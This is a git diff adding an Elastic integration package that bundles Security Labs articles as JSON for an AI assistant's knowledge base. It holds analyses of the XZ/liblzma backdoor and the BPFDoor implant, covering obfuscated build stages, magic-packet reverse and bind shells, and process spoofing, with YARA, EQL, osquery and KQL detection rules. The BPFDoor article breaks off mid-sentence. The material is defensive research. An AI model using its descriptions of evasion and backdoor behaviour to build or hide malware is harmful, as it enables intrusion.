diff --git a/.github/CODEOWNERS b/.github/CODEOWNERS
index 45d11e72fa1..fffb55a6ca5 100644
--- a/.github/CODEOWNERS
+++ b/.github/CODEOWNERS
@@ -362,6 +362,7 @@
/packages/salesforce @elastic/obs-infraobs-integrations
/packages/santa @elastic/security-service-integrations
/packages/security_ai_prompts @elastic/security-generative-ai
+/packages/security_labs_content @elastic/security-generative-ai
/packages/security_detection_engine @elastic/protections
/packages/sentinel_one @elastic/security-service-integrations
/packages/sentinel_one_cloud_funnel @elastic/security-service-integrations
diff --git a/packages/security_labs_content/LICENSE.txt b/packages/security_labs_content/LICENSE.txt
new file mode 100644
index 00000000000..809108b857f
--- /dev/null
+++ b/packages/security_labs_content/LICENSE.txt
@@ -0,0 +1,93 @@
+Elastic License 2.0
+
+URL: https://www.elastic.co/licensing/elastic-license
+
+## Acceptance
+
+By using the software, you agree to all of the terms and conditions below.
+
+## Copyright License
+
+The licensor grants you a non-exclusive, royalty-free, worldwide,
+non-sublicensable, non-transferable license to use, copy, distribute, make
+available, and prepare derivative works of the software, in each case subject to
+the limitations and conditions below.
+
+## Limitations
+
+You may not provide the software to third parties as a hosted or managed
+service, where the service provides users with access to any substantial set of
+the features or functionality of the software.
+
+You may not move, change, disable, or circumvent the license key functionality
+in the software, and you may not remove or obscure any functionality in the
+software that is protected by the license key.
+
+You may not alter, remove, or obscure any licensing, copyright, or other notices
+of the licensor in the software. Any use of the licensor’s trademarks is subject
+to applicable law.
+
+## Patents
+
+The licensor grants you a license, under any patent claims the licensor can
+license, or becomes able to license, to make, have made, use, sell, offer for
+sale, import and have imported the software, in each case subject to the
+limitations and conditions in this license. This license does not cover any
+patent claims that you cause to be infringed by modifications or additions to
+the software. If you or your company make any written claim that the software
+infringes or contributes to infringement of any patent, your patent license for
+the software granted under these terms ends immediately. If your company makes
+such a claim, your patent license ends immediately for work on behalf of your
+company.
+
+## Notices
+
+You must ensure that anyone who gets a copy of any part of the software from you
+also gets a copy of these terms.
+
+If you modify the software, you must include in any modified copies of the
+software prominent notices stating that you have modified the software.
+
+## No Other Rights
+
+These terms do not imply any licenses other than those expressly granted in
+these terms.
+
+## Termination
+
+If you use the software in violation of these terms, such use is not licensed,
+and your licenses will automatically terminate. If the licensor provides you
+with a notice of your violation, and you cease all violation of this license no
+later than 30 days after you receive that notice, your licenses will be
+reinstated retroactively. However, if you violate these terms after such
+reinstatement, any additional violation of these terms will cause your licenses
+to terminate automatically and permanently.
+
+## No Liability
+
+*As far as the law allows, the software comes as is, without any warranty or
+condition, and the licensor will not be liable to you for any damages arising
+out of these terms or the use or nature of the software, under any kind of
+legal claim.*
+
+## Definitions
+
+The **licensor** is the entity offering these terms, and the **software** is the
+software the licensor makes available under these terms, including any portion
+of it.
+
+**you** refers to the individual or entity agreeing to these terms.
+
+**your company** is any legal entity, sole proprietorship, or other kind of
+organization that you work for, plus all organizations that have control over,
+are under the control of, or are under common control with that
+organization. **control** means ownership of substantially all the assets of an
+entity, or the power to direct its management and policies by vote, contract, or
+otherwise. Control can be direct or indirect.
+
+**your licenses** are all the licenses granted to you for the software under
+these terms.
+
+**use** means anything you do with the software requiring one of your licenses.
+
+**trademark** means trademarks, service marks, and similar rights.
diff --git a/packages/security_labs_content/changelog.yml b/packages/security_labs_content/changelog.yml
new file mode 100644
index 00000000000..80d9b957590
--- /dev/null
+++ b/packages/security_labs_content/changelog.yml
@@ -0,0 +1,6 @@
+# newer versions go on top
+- version: "0.0.1"
+ changes:
+ - description: Initial draft of the package
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/13967
diff --git a/packages/security_labs_content/docs/README.md b/packages/security_labs_content/docs/README.md
new file mode 100644
index 00000000000..6bdf6f3c710
--- /dev/null
+++ b/packages/security_labs_content/docs/README.md
@@ -0,0 +1,46 @@
+# Security Labs Content Integration (Beta)
+
+## Overview
+
+The **Security Labs Content** integration provides Elastic Security Labs articles for use within Elastic Security.
+
+This integration is in **beta** and subject to changes. Feedback and contributions are welcome.
+
+## Requirements
+
+- Elastic Stack **8.19.x**, **9.1.x**, or later.
+- Kibana with the **Elastic Assistant** plugin enabled.
+
+## Installation
+
+This integration is installed automatically when users set up the **Security AI Assistant knowledge base** in Kibana. No manual setup is required.
+
+## Usage
+
+1. Navigate to **Security Solution** in Kibana.
+2. The Security Labs content is used automatically by the Security AI Assistant.
+
+## Developer Guide
+
+Developers updating this integration must regenerate and update the Security Labs content files in the package:
+
+1. Generate the Security Labs content in the Kibana repository:
+ ```sh
+ cd x-pack/solutions/security/plugins/elastic_assistant
+ yarn generate-security-labs-content
+ ```
+2. Copy the updated content files to this package:
+ ```sh
+ cd packages/security_labs_content/kibana/security_labs_content
+ rm ./*.json
+ cp $KIBANA_HOME/target/security_labs_content/*.json .
+ ```
+
+## Known Issues & Limitations
+This integration is currently in beta and subject to change.
+
+## Contributing
+Contributions are welcome! If you encounter issues or have suggestions, please open an issue or submit a pull request.
+
+## License
+This integration is subject to the Elastic License 2.0.
diff --git a/packages/security_labs_content/img/security-logo-color-64px.svg b/packages/security_labs_content/img/security-logo-color-64px.svg
new file mode 100644
index 00000000000..64deb46be7d
--- /dev/null
+++ b/packages/security_labs_content/img/security-logo-color-64px.svg
@@ -0,0 +1,14 @@
+
+
\ No newline at end of file
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-2022_elastic_global_threat_report_announcement-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-2022_elastic_global_threat_report_announcement-md.json
new file mode 100644
index 00000000000..d437654e552
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-2022_elastic_global_threat_report_announcement-md.json
@@ -0,0 +1,24 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"2022 Elastic Global Threat Report Announcement\"\nslug: \"2022-elastic-global-threat-report-announcement\"\ndate: \"2022-11-30\"\ndescription: \"Discover our latest findings & strategic recommendations to better stay informed of potential directions threat actors may focus on.\"\nauthor:\n - slug: devon-kerr\nimage: \"gtr-blog-image-720x420.jpg\"\ncategory:\n - slug: reports\n---\n\nToday Elastic Security Labs celebrates another milestone: launching the [2022 Elastic Global Threat Report](https://www.elastic.co/explore/security-without-limits/global-threat-report), our inaugural summary of threat trends, forecasts, and recommendations. We analyzed millions of telemetry events from sources around the world to share these insights with you; all part of our continued commitment to transparency, and our mission to protect the world's data.\n\nYou can find the report [here](https://www.elastic.co/explore/security-without-limits/global-threat-report), we're excited to share it with you.\n"
+ },
+ "title": "2022 Elastic Global Threat Report Announcement",
+ "slug": "2022-elastic-global-threat-report-announcement",
+ "date": "2022-11-30",
+ "description": "Discover our latest findings & strategic recommendations to better stay informed of potential directions threat actors may focus on.",
+ "author": [
+ {
+ "slug": "devon-kerr"
+ }
+ ],
+ "image": "gtr-blog-image-720x420.jpg",
+ "category": [
+ {
+ "slug": "reports"
+ }
+ ]
+ },
+ "id": "security_labs_content-2022_elastic_global_threat_report_announcement-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-2022_elastic_global_threat_report_helping_security_leaders_navigate_todays_threat_landscape-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-2022_elastic_global_threat_report_helping_security_leaders_navigate_todays_threat_landscape-md.json
new file mode 100644
index 00000000000..37995ae173d
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-2022_elastic_global_threat_report_helping_security_leaders_navigate_todays_threat_landscape-md.json
@@ -0,0 +1,24 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"2022 Elastic Global Threat Report: Helping security leaders navigate today’s threat landscape\"\nslug: \"2022-elastic-global-threat-report-helping-security-leaders-navigate-todays-threat-landscape\"\ndate: \"2022-11-30\"\ndescription: \"A significant percentage of all cyber threats achieve a degree of success against technical, procedural, and human mitigations. So what is a company to do in the face of such unfavorable odds? Find out in this article.\"\nauthor:\n - slug: ken-exner\nimage: \"gtr-blog-image-720x420.jpg\"\ncategory:\n - slug: reports\n---\n\nAs the threat landscape continues to evolve, cybersecurity stakes are growing exponentially higher for today’s organizations. Between Log4j, geopolitical tension, and increasing ransomware threats, security is not just at the top of the business agenda but also the societal agenda. Meanwhile, threat actors have adopted new capabilities and methods while increasing their cadence of activity.\n\nThreat detection and response has come a long way since the firewall dissolved and the cloud took center stage. AI and machine learning, for example, have been major contributors to the advancement of cybersecurity. Machine learning is being used to identify malicious behavior from bad actors by modeling network behavior and improving overall threat detection.\n\nWhat’s been difficult is the sea of sameness filled with vendors promising products to mitigate today’s threats while preparing for the next one. As the [2022 Elastic Global Threat Report](https://www.elastic.co/explore/security-without-limits/global-threat-report) outlines, a significant percentage of all threats achieve a degree of success against technical, procedural, and human mitigations. So what is a company to do in the face of such unfavorable odds? 
At Elastic, we believe there are several ingredients that are critical to managing today’s threat landscape.\n\n## Build a program, not just a tool\n\nVendors need to start thinking about security products as more than software. They are part of a living, breathing program that takes care and feeding. For Elastic, it’s not just about shipping a solution; it’s about offering a holistic approach to security that happens to come with a great product. It’s sharing insights and best practices and creating a community focused on security data intelligence that extends the value of Elastic Security for customers.\n\nThe 2022 Elastic Threat Report is an important part of that program, and we’re excited to share our knowledge with the community. In addition to vital information from the Elastic Security Labs team, the report provides actionable guidance to security practitioners about how to maximize positive outcomes for their organizations.\n\n## It takes an (open) community\n\nThe foundation of any good program is a strong community that can support and foster it. Take Elastic’s commitment to open security, for example. 
The community born from vendors being transparent about their security controls, detection rules, and threat logic can be a force multiplier of best practices across the entire industry.\n\nWhen vendors engage their experts with experts from across the broader security community about new threats they’ve observed or innovative methods for detecting nuanced attacks, it creates greater scalability of system defenses — not just for the enterprise but also for their customers.\n\nFor example, at Elastic we recently opened our Endpoint Security [protections-artifacts repo](https://github.com/elastic/protections-artifacts), adding to our already open [detection-rules repo](https://github.com/elastic/detection-rules/tree/main/rules), to foster further collaboration with our community and be transparent about how we protect users.\n\n## Treat the cause, not the symptom\n\nDespite the ever-growing threat landscape and the risks that it poses, many organizations are still treating security symptoms instead of the cause. Companies can no longer afford to keep the security team siloed and separate from the engineering team. The two functions must work closely to build products and solutions that can withstand the barrage of advancing threats.\n\nAt Elastic, we design and build products with security in mind from the start, so it’s baked into every solution we ship to our customers. In fact, we take security so seriously that the office of InfoSec is part of the engineering organization.\n\nWe hope that the 2022 Elastic Global Threat Report will help your understanding of the important shifts in the threat landscape, and provide the information you need to make your organization more resilient, prepared, and protected.\n\n[Download the 2022 Elastic Global Threat Report](https://www.elastic.co/explore/security-without-limits/global-threat-report).\n"
+ },
+ "title": "2022 Elastic Global Threat Report: Helping security leaders navigate today’s threat landscape",
+ "slug": "2022-elastic-global-threat-report-helping-security-leaders-navigate-todays-threat-landscape",
+ "date": "2022-11-30",
+ "description": "A significant percentage of all cyber threats achieve a degree of success against technical, procedural, and human mitigations. So what is a company to do in the face of such unfavorable odds? Find out in this article.",
+ "author": [
+ {
+ "slug": "ken-exner"
+ }
+ ],
+ "image": "gtr-blog-image-720x420.jpg",
+ "category": [
+ {
+ "slug": "reports"
+ }
+ ]
+ },
+ "id": "security_labs_content-2022_elastic_global_threat_report_helping_security_leaders_navigate_todays_threat_landscape-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-500ms_to_midnight-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-500ms_to_midnight-md.json
new file mode 100644
index 00000000000..a0717e23acc
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-500ms_to_midnight-md.json
@@ -0,0 +1,38 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"500ms to midnight: XZ / liblzma backdoor\"\nslug: \"500ms-to-midnight\"\ndate: \"2024-04-05\"\ndescription: \"Elastic Security Labs is releasing an initial analysis of the XZ Utility backdoor, including YARA rules, osquery, and KQL searches to identify potential compromises.\"\nauthor:\n - slug: samir-bousseaden\n - slug: mika-ayenson\n - slug: jake-king\nimage: \"500ms-to-midnight.jpg\"\ncategory:\n - slug: security-research\n - slug: vulnerability-updates\ntags:\n - linux\n - vulnerability\n - cve-2024-3094\n---\n\n## Key Takeaways\n\n* On March 29, 2024, Andres Freund identified malicious commits to the command-line utility XZ, impacting versions 5.6.0 and 5.6.1 for Linux, and shared the information on the oss-security mailing list.\n* Andres’ discovery was made after an increase of _500ms_ in latency was observed with SSH login attempts initiated from a development system, amongst other anomalies.\n* The backdoor identified has been designed to circumvent authentication controls within SSH to remotely execute code, potentially gaining access to other systems in the environment.\n* The code commits were added and signed by [JiaT75](https://tukaani.org/xz-backdoor) (now suspended), who contributed to the popular open source project for several years.\n* Security researchers are still undertaking an initial analysis of the payload, dissecting both the build process and the backdoor.\n* Elastic has released both YARA signatures, detection rules, and osquery queries, allowing Linux system maintainers to understand the impact and block potential compromises early.\n\n## The XZ / liblzma backdoor at a glance\n\nOn March 29 2024, the widely adopted XZ package used within many Linux distributions as a library used by the system to interact with SSH client connections (and many other system utilities) was pulled into the spotlight after a _500ms_ delay with intermittent failures. 
What began as a routine investigation into that anomaly would take a surprising and unexpected twist: malicious, obfuscated code was planted in the package by a maintainer–code that was also in circulation for a few weeks via a poisoned build process.\n\nAndres Freund, the developer who initially [identified the malicious contributions](https://www.openwall.com/lists/oss-security/2024/03/29/4), observed that the changes had been implemented in versions `5.6.0` and `5.6.1` of the XZ Utils package but had not been widely adopted across all Linux distributions, outside of select bleeding-edge variants typically used for early-stage testing.\n\n[Initial analysis](https://bsky.app/profile/filippo.abyssdomain.expert/post/3kowjkx2njy2b) has shown that the backdoor is designed to circumvent authentication controls in `sshd` via `systemd` and attempts to execute code within a pre-authentication context. Observations made so far have shown that the malicious code is not in its final target state and was perhaps caught early through haphazard mistakes the developer neglected to consider, causing impacts to legitimate SSH use cases.\n\nAlongside the malicious package being circulated within a small number of Linux distributions, several observations have been made in the popular package management software HomeBrew, which has impacted some macOS users. The maintainers of Homebrew-- and other software packages that included this library-- are presently rolling back to prior versions that aren't impacted by these malicious changes, although mainly out of an abundance of caution, as compromised builds were only targeting deb and rpm packages.\n\nThe following notice was released on the Tukaani Project’s homepage (the project owner of the [XZ Utils Git repository](https://github.com/tukaani-project/xz)) shortly after the news of the backdoor broke.\n\n\n\n\nThe compromise itself, while high risk, is relatively minor in terms of real-world impact given the stage of discovery. 
This situation should remind security professionals about the importance of understanding supply-chain compromise, monitoring Linux workloads, and auditing system controls. In this situation, defenders had the advantage of time. \n\n## Backdoor analysis\n\n### XZ backdoor build process:\n\n[CVE-2024-3094](https://nvd.nist.gov/vuln/detail/CVE-2024-3094) explains how the changes in the `liblzma` were created from the malicious additions to the library’s build scripts and directly impacts any software that links the library on an impacted system.\n\nThe maliciously modified build script is divided into three stages, starting with the additions in `m4/build-to-host.m4` and progressing through the obfuscation and execution stages. At a high level, some obfuscation techniques include character substitution and selective byte processing commands via the `tr` and `head` commands to decode and execute the malicious payloads in the test files. Interestingly, many impacted tools used are standard Linux system tools typically used by administrators for legitimate purposes.\n\nThe [build process](https://gynvael.coldwind.pl/?lang=en&id=782) runs as follows :\n\n* **Stage 0:** The initial malicious code additions attempt to decode the Stage 1 script (hidden code segments) by changing byte values from specific test files, which under normal circumstances appear corrupt, to form a valid XZ stream.\n* **Stage 1:** This stage leverages a bash file with special checks (e.g., the Linux architecture the script runs on) and Bash commands to analyze the environment (e.g. `[ \"$(uname)\" = \"Linux\" ]`) to ensure compatible conditions are met for the backdoor. 
Depending on the outcome of the checks, additional malicious scripts or payloads may be executed.\n* **Stage 2:** This phase involves an infected.txt file, which details the altered extraction and compilation code modifications, namely:\n * Reconstruction Data: Byte manipulation and decoding techniques on obfuscated compressed data from test files to reconstruct the malicious payload using commands like `sed` and `awk`\n * Obfuscation and Extraction: Complex decryption and obfuscation techniques using the `tr` command to extract the binary backdoor to remain hidden from typical detection mechanisms\n * Build Process Manipulation: This changes the build and compilation steps to embed the binary backdoor into Linux system processes\n * Extension Mechanism: A design that allows for new scripts and updates to the backdoor without modifying the original payload\n * Future Stage Preparation: Sets the groundwork for malicious follow-up activities, like propagating the backdoor \n\n## Assessing impact:\n\nGiven the limited usage of the impacted beta distributions and software, this compromise should impact few systems. 
Maintainers of Linux systems are however encouraged to ensure systems are not running impacted versions of `xzutils` / `liblzma` by leveraging the following osquery queries:\n\n[Linux](https://gist.github.com/jamesspi/ee8319f55d49b4f44345c626f80c430f):\n\n```\nSELECT 'DEB Package' AS source, name, version,\n CASE\n WHEN version LIKE '5.6.0%' OR version LIKE '5.6.1%' THEN 'Potentially Vulnerable'\n ELSE 'Most likely not vulnerable'\n END AS status\nFROM deb_packages\nWHERE name = 'xz-utils' OR name = 'liblzma' OR name LIKE 'liblzma%'\nUNION\nSELECT 'RPM Package' AS source, name, version,\n CASE\n WHEN version LIKE '5.6.0%' OR version LIKE '5.6.1%' THEN 'Potentially Vulnerable'\n ELSE 'Most likely not vulnerable'\n END AS status\nFROM rpm_packages\nWHERE name = 'xz-utils' OR name = 'liblzma' OR name LIKE 'liblzma%';\n\n```\n\n[macOS](https://gist.github.com/jamesspi/5cb060b5e0e2d43222a71c876b56daab):\n\n```\nSELECT 'Homebrew Package' AS source, name, version,\n CASE\n WHEN version LIKE '5.6.0%' OR version LIKE '5.6.1%' THEN 'Potentially Vulnerable'\n ELSE 'Most likely not vulnerable'\n END AS status\nFROM homebrew_packages\nWHERE name = 'xz' OR name = 'liblzma';\n```\n\nThe following KQL query can be used to query Elastic Defend file events: \n\n```\nevent.category : file and host.os.type : (macos or linux) and file.name : liblzma.so.5.6.*\n```\n\nAlternatively, manually checking the version of XZ running on a system is as simple as running the [following commands](https://x.com/Kostastsale/status/1773890846250926445?s=20) (from researcher [Kostas](https://twitter.com/Kostastsale)) and checking the output version. 
Remember, versions 5.6.0 and 5.6.1 are impacted and should be rolled back or updated to a newer version.\n\n```\nfor xz_p in $(type -a xz | awk '{print $NF}' | uniq); do strings \"$xz_p\" | grep \"xz (XZ Utils)\" || echo \"No match found for $xz_p\"; done\n```\n\n## Malware protection\n\nThe following [YARA signature](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Linux_Trojan_XZBackdoor.yar) (disk and in-memory) is deployed in Elastic Defend to block the XZ backdoor.\n\n```\nrule Linux_Trojan_XZBackdoor {\n meta:\n author = \"Elastic Security\"\n fingerprint = \"f1982d1db5aacd2d6b0b4c879f9f75d4413e0d43e58ea7de2b7dff66ec0f93ab\"\n creation_date = \"2024-03-30\"\n last_modified = \"2024-03-31\"\n threat_name = \"Linux.Trojan.XZBackdoor\"\n reference_sample = \"5448850cdc3a7ae41ff53b433c2adbd0ff492515012412ee63a40d2685db3049\"\n severity = 100\n arch_context = \"x86\"\n scan_context = \"file, memory\"\n license = \"Elastic License v2\"\n os = \"linux\"\n strings:\n /* potential backdoor kill-switch as per https://gist.github.com/q3k/af3d93b6a1f399de28fe194add452d01?permalink_comment_id=5006558#file-hashes-txt-L115 */\n $a1 = \"yolAbejyiejuvnup=Evjtgvsh5okmkAvj\"\n/* function signature in liblzma used by sshd */\n $a2 = { F3 0F 1E FA 55 48 89 F5 4C 89 CE 53 89 FB 81 E7 00 00 00 80 48 83 EC 28 48 89 54 24 18 48 89 4C 24 10 }\n /* unique byte patterns in backdoored liblzma */\n $b1 = { 48 8D 7C 24 08 F3 AB 48 8D 44 24 08 48 89 D1 4C 89 C7 48 89 C2 E8 ?? ?? ?? ?? 
89 C2 }\n $b2 = { 31 C0 49 89 FF B9 16 00 00 00 4D 89 C5 48 8D 7C 24 48 4D 89 CE F3 AB 48 8D 44 24 48 }\n $b3 = { 4D 8B 6C 24 08 45 8B 3C 24 4C 8B 63 10 89 85 78 F1 FF FF 31 C0 83 BD 78 F1 FF FF 00 F3 AB 79 07 }\n condition:\n 1 of ($a*) or all of ($b*)\n}\n```\n\nDetections of this signature will appear in Elastic as follows: \n\n\n\n\n## Behavior Detection\n\nLeveraging [Elastic Defend](https://docs.elastic.co/en/integrations/endpoint)’s network and process events, we published a new EQL [detection rule](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_suspicious_ssh_execution_xzbackdoor.toml) to identify instances where the SSHD service starts, spawns a shell process and immediately terminates unexpectedly all within a very short time span: \n\n```\nsequence by host.id, user.id with maxspan=1s\n [process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and process.name == \"sshd\" and\n process.args == \"-D\" and process.args == \"-R\"] by process.pid, process.entity_id\n [process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and process.parent.name == \"sshd\" and \n process.executable != \"/usr/sbin/sshd\"] by process.parent.pid, process.parent.entity_id\n [process where host.os.type == \"linux\" and event.action == \"end\" and process.name == \"sshd\" and process.exit_code != 0] by process.pid, process.entity_id\n [network where host.os.type == \"linux\" and event.type == \"end\" and event.action == \"disconnect_received\" and process.name == \"sshd\"] by process.pid, process.entity_id\n```\n\n\n\n\n\n\n\n\n## Linux: the final frontier\n\nWhile observations of supply chain-based attacks or exploitation of vulnerabilities rarely reach this level of global press coverage, Elastic’s observations described in the [2023 Global Threat Report](https://www.elastic.co/explore/security-without-limits/global-threat-report) show that Linux-based signature events 
continue to grow in our dataset. This growth is partially tied to growth in the systems we observe that report on threat behavior, but it strongly suggests that adversaries are becoming increasingly focused on Linux systems. \n\nLinux is and will continue to be on the [minds of threat groups](https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor), as its widespread adoption across the internet reinforces its importance. In this case, adversarial groups were trying to circumvent existing controls that would allow for future compromise through other means.\n\nWhile the objectives of the person(s) behind the XZ backdoor haven’t been made clear yet, it is within the technical capabilities of many threat entities focused on espionage, extortion, destruction of data, intellectual property theft, and human rights abuses. With the ability to execute code on impacted Internet-accessible systems, it’s reasonable to assume that bad actors would further infiltrate victims. Elastic Security Labs sees that Linux visibility has been dramatically improving and enterprises have started to effectively manage their Linux populations, but many organizations reacting to this supply chain compromise are still at the start of that process.\n"
+ },
+ "title": "500ms to midnight: XZ / liblzma backdoor",
+ "slug": "500ms-to-midnight",
+ "date": "2024-04-05",
+ "description": "Elastic Security Labs is releasing an initial analysis of the XZ Utility backdoor, including YARA rules, osquery, and KQL searches to identify potential compromises.",
+ "author": [
+ {
+ "slug": "samir-bousseaden"
+ },
+ {
+ "slug": "mika-ayenson"
+ },
+ {
+ "slug": "jake-king"
+ }
+ ],
+ "image": "500ms-to-midnight.jpg",
+ "category": [
+ {
+ "slug": "security-research"
+ },
+ {
+ "slug": "vulnerability-updates"
+ }
+ ],
+ "tags": [
+ "linux",
+ "vulnerability",
+ "cve-2024-3094"
+ ]
+ },
+ "id": "security_labs_content-500ms_to_midnight-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-a_peek_behind_the_bpfdoor-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-a_peek_behind_the_bpfdoor-md.json
new file mode 100644
index 00000000000..166a8cffa48
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-a_peek_behind_the_bpfdoor-md.json
@@ -0,0 +1,27 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"A peek behind the BPFDoor\"\nslug: \"a-peek-behind-the-bpfdoor\"\ndate: \"2022-07-13\"\ndescription: \"In this research piece, we explore BPFDoor — a backdoor payload specifically crafted for Linux in order to gain re-entry into a previously or actively compromised target environment.\"\nauthor:\n - slug: jake-king\n - slug: colson-wilhoit\nimage: \"blog-security-detection-720x420.png\"\ncategory:\n - slug: attack-pattern\n---\n\n## Preamble\n\n[BPFDoor](https://doublepulsar.com/bpfdoor-an-active-chinese-global-surveillance-tool-54b078f1a896) is a backdoor payload specifically crafted for Linux. Its purpose is for long-term persistence in order to gain re-entry into a previously or actively compromised target environment. It notably utilizes BPF along with a number of other techniques to achieve this goal, taking great care to be as efficient and stealthy as possible. PWC researchers discovered this very interesting piece of malware in 2021. PWC attributes this back door to a specific group from China, Red Menshen, and detailed a number of interesting components in a high-level threat research post released [last week](https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-report-download.pdf).\n\nPWC’s findings indicated that Red Menshen had focused their efforts on targeting specific Telecommunications, Government, Logistics, and Education groups across the Middle East and Asia. 
This activity has been across a Monday-to-Friday working period, between 01:00 UTC and 10:00 UTC, indicating that the operators of the malware were consistent in their attacks, and operation during a working week.\n\nPerhaps most concerningly, the payload itself has been observed across the last 5 years in various phases of development and complexity, indicating that the threat actor responsible for operating the malware has been at it for some time, undetected in many environments.\n\n> **BPFDoor Tools**\n>\n> The Elastic Security Team has created a few tools that will aid researchers in analyzing the BPFDoor malware.\n>\n> The BPFDoor scanner will allow you to scan for hosts infected with the BPFDoor malware and the BPFDoor configuration extractor will allow you to extrapolate the malware’s configuration or hardcoded values which can lead to additional observations you can use for further analysis, developing additional signatures or connecting to the backdoor utilizing our client.\n>\n> - [BPFDoor scanner](https://www.elastic.co/security-labs/bpfdoor-scanner)\n> - [BPFDoor configuration extractor](https://www.elastic.co/security-labs/bpfdoor-configuration-extractor)\n\n## Attack Lifecycle\n\nThis inherently passive backdoor payload is built to be a form of persistence – a method to regain access if the first or second stage payloads are lost. It is built for and intended to be installed on high-uptime servers or appliances, IoT/SCADA, or cloud systems with access to the Internet. The backdoor usually sits in temporary storage so if a server were to be rebooted or shut down, the backdoor would be lost.\n\nIt should be assumed that if this malware is found on a system the initial-access (1st stage) or post-exploitation (2nd stage) payloads are still most likely present and possibly active elsewhere in the environment. 
This backdoor excels at stealth, taking every opportunity to blend in and remain undetected.\n\nIn the below steps, we will break BPFDoor’s actions down according to the vast majority of the samples available.\n\n1. When executed, the binary copies itself into /dev/shm/. This temporary filesystem (/dev/shm stands for shared memory) is a file storage facility serving as an efficient means of inter-process communication\n2. Renames its process to kdmtmpflush, a hardcoded process name\n3. Initializes itself with the -init flag and forks itself. Forking in Linux means creating a new process by duplicating the calling process\n4. Deletes itself by removing the original binary invoked. The forked process continues to run\n5. Alters the forked process’s creation and modification time values, also known as [timestomping](https://attack.mitre.org/techniques/T1070/006/)\n6. Creates a new process environment for itself and removes the old one, setting (spoofing) a new process name. It changes the way it appears on the system, akin to wearing a mask. The process is still kdmtmpflush, but if you were to run a ps you would see whatever value it set\n7. Creates a process ID (PID) file in /var/run. PID files are text files containing the process ID of the associated program, meant for preventing multiple starts, marking residency, and used by the program to stop itself. This file resides in /var/run, another temporary file storage facility\n8. Creates a raw network socket. On Linux, a socket is an endpoint for network communication that allows you to specify in detail every section of a packet, allowing a user to implement their own transport layer protocol above the internet (IP) level\n9. Sets BPF filters on the raw socket. [BPF](https://www.kernel.org/doc/html/v5.12/networking/filter.html) allows a user-space program to attach a filter onto any socket and allow or disallow certain types of data to come through the socket\n10. Observes incoming packets\n11. 
If a packet is observed that matches the BPF filters and contains the required data, it is passed to the backdoor for processing\n12. It forks the current process again\n13. Changes the forked process’s working directory to /\n14. Changes (spoofs) the name of the forked process to a hardcoded value\n15. Based on the password or existence of a password sent in the “magic packet”, the backdoor provides a reverse shell, establishes a bind shell, or sends back a ping\n\n> **Atypical BPFDoor sample**\n>\n> Of note, there is one [sample](https://www.virustotal.com/gui/file/07ecb1f2d9ffbd20a46cd36cd06b022db3cc8e45b1ecab62cd11f9ca7a26ab6d/detection) we have come across that does not seem to exhibit steps 1 - 4. It doesn’t alter its initial name to a hardcoded value and simply executes from its placed location; otherwise, it models the same behavior.\n\nBelow you can see visual representations of the BPFDoor process tree, utilizing Elastic’s Analyzer View. The first image displays the tree prior to active use of the backdoor (i.e., reverse shell, bind shell, or pingback) and the second image after a reverse shell has connected and performed post-exploitation activities.\n\n\n\n\n\n## Defense Evasion Insights\n\nBPFDoor is interesting given the anti-forensics and obfuscation tactics used. Astute readers will observe slight differences in the PID tree visible when running a ps ajxf on an infected host when compared to executed data within the Analyzer View inside of Elastic. This is due to the process name spoofing mentioned in step 6 of the attack lifecycle above. The image below is taken from a system running BPFDoor with an active reverse shell connection established:\n\n\n\nThe difference lies in the fact that kdmtmpflush and sh are run prior to spoofing, and are captured at runtime by Elastic Endpoint. 
This is an accurate representation of the processes active on the host, further confirming the importance of appropriate observation software for Linux hosts - you can’t always trust what you see on the local system:\n\n\n\nBPFDoor also holds in its repertoire the ability to subvert the traditional Linux socket client-server architecture in order to hide its malicious traffic. The methods it utilizes to achieve this are both unusual and intriguing.\n\nThe sockets interface is almost synonymous with TCP/IP communication. This simple interface has endured for over 40 years - predating both Linux and Windows implementations.\n\n\n\nBPFDoor uses a raw socket (as opposed to ‘cooked’ ones that handle IP/TCP/UDP headers transparently) to observe every packet arriving at the machine, Ethernet frame headers and all. While this might sound like a stealthy way to intercept traffic, it’s actually not – on any machine with a significant amount of network traffic, the CPU usage will be consistently high.\n\nThat’s where BPF comes in - an extremely efficient, kernel-level packet filter is the perfect tool to allow the implant to ignore 99% of network traffic and only become activated when a special pattern is encountered. This implant looks for a so-called magic packet in every TCP, UDP, and ICMP packet received on the system.\n\nOnce activated, a typical reverse shell - which this backdoor also supports - creates an outbound connection to a listener set up by the attacker. This has the advantage of bypassing firewalls watching inbound traffic only. This method is well understood by defenders, however. The sneakiest way to get a shell connected would be to reuse an existing packet flow, redirected to a separate process.\n\nIn this attack, the initial TCP handshake is done between the attacker and a completely legitimate process – for example nginx or sshd. 
